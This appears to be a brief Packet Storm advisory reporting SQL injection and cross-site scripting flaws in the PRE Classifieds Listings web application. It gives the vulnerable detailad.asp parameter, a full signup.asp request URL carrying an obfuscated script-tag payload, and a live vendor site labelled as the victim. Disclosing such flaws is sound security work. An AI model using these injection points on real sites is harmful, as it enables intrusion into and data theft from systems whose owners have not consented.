Pre Classifieds Listings suffers from cross site scripting and remote SQL injection vulnerabilities.
7bb1766c3df1bdeca1568590dcba35bc#########################################################
---------------------------------------------------------
Portal Name: PRE Classifieds Listings
Vendor : http://www.preproject.com/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/home/detailad.asp?siteid=[SQL]
[XSS]:
http://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start
---------------------------------
Victem :
http://preproject.com/pclasp/
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!